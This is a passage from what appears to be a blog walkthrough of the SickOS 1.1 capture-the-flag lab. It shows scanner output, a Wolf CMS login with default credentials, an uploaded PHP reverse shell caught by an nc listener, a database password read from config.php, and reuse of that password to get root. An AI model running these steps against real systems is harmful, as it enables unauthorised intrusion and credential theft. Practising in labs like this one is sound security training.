+ OSVDB-2735: /scripts/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-2735: /fcgi-bin/musicqueue.cgi: Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/
+ OSVDB-275: /scripts/tools/newdsn.exe: This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. http://www.securityfocus.com/bid/1818. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)
+ OSVDB-279: /cgi-915/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgis/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-perl/windmail: Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /scripts/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /fcgi-bin/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ OSVDB-279: /cgi-exe/windmail.exe: Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 2 error(s) and 589 item(s) reported on remote host
+ End Time: 2017-01-11 21:10:07 (GMT2) (246 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

SingleScan is testing URL: 'http://192.168.1.9:80/'
[19:18:55] [OUT] Inspecting URL 'http://192.168.1.9:80/'...

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.1.9:80/
[+] Threads : 10
[+] Wordlist : /usr/share/wfuzz/wordlist/general/big.txt
[+] Status codes : 302,307,403,500,200,204,301
[+] Proxy : http://192.168.1.9:3128/
[+] Expanded : true
=====================================================
http://192.168.1.9:80/cgi-bin/ (Status: 403)
http://192.168.1.9:80/connect (Status: 200)
http://192.168.1.9:80/index (Status: 200)
=====================================================

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jan 11 21:18:58 2017
URL_BASE: http://192.168.1.9:80/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
PROXY: 192.168.1.9:3128

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.1.9:80/ ----
+ http://192.168.1.9:80/cgi-bin/ (CODE:403|SIZE:287)
+ http://192.168.1.9:80/connect (CODE:200|SIZE:109)
+ http://192.168.1.9:80/index (CODE:200|SIZE:21)
+ http://192.168.1.9:80/robots (CODE:200|SIZE:45)
+ http://192.168.1.9:80/robots.txt (CODE:200|SIZE:45)
+ http://192.168.1.9:80/server-status (CODE:403|SIZE:292)

-----------------
END_TIME: Wed Jan 11 21:19:13 2017
DOWNLOADED: 20458 - FOUND: 6
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer *
********************************************************

Target: http://192.168.1.9:80
Total requests: 3036

==================================================================
ID Response Lines Word Chars Request
==================================================================

Fatal exception: FUZZ words and number of payloads do not match!

+ http://192.168.1.9:80/cgi-bin/

status
{ "uptime": " 02:28:29 up 2:37, 0 users, load average: 0.00, 0.01, 0.03", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

+ http://192.168.1.9:80/server-status
Forbidden

You don't have permission to access /cgi-bin/ on this server.
Apache/2.2.22 (Ubuntu) Server at 192.168.1.9 Port 80

+ http://192.168.1.9:80/connect
#!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

http://192.168.1.9/index
<h1>
BLEHHH!!!
</h1>

http://192.168.1.9:80/robots
http://192.168.1.9/robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms

http://192.168.1.9/wolfcms/

http://192.168.1.9/wolfcms/?/admin/login
admin:admin
Wolf CMS 0.8.2

Upload reverse shell
http://192.168.1.9/wolfcms/public/php-reverse-shell.php

nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 45100
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
03:18:00 up 3:27, 0 users, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@SickOs:/$

www-data@SickOs:/etc/apache2/sites-available$ cat default
cat default
<VirtualHost *:80>
ServerAdmin webmaster@localhost

DocumentRoot /var/www
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>
www-data@SickOs:/etc/apache2/sites-available$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ ls
ls
connect.py
index.php
robots.txt
wolfcms
www-data@SickOs:/var/www$ cd wolfcms
cd wolfcms
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf
www-data@SickOs:/var/www/wolfcms$ cat config.php
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
su: must be run from a terminal
www-data@SickOs:/var/www/wolfcms$ python -c 'import pty; pty.spawn("/bin/sh")'
<lfcms$ python -c 'import pty; pty.spawn("/bin/sh")'
$ su sickos
su sickos
Password: john@123
sickos@SickOs:/var/www/wolfcms$ cd ~
sickos@SickOs:~$ cat .bash_history
cat .bash_history
sudo su
exit

sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123

root@SickOs:/home/sickos# cd /root
cd /root
root@SickOs:~# ls -la
ls -la
total 40
drwx------ 3 root root 4096 Dec 6 2015 .
drwxr-xr-x 22 root root 4096 Sep 22 2015 ..
-rw-r--r-- 1 root root 96 Dec 6 2015 a0216ea4d51874464078c618298b1367.txt
-rw------- 1 root root 3724 Dec 6 2015 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwx------ 2 root root 4096 Sep 22 2015 .cache
-rw------- 1 root root 22 Dec 5 2015 .mysql_history
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
-rw------- 1 root root 5230 Dec 6 2015 .viminfo
root@SickOs:~# cat *.txt
cat *.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

Regards,
Yuriy Stanchev/URIX

Pages

Thursday 19 January 2017

Natas Level 0 to 10

SickOS 1.2

SickOS 1.1

About Me

Total Pageviews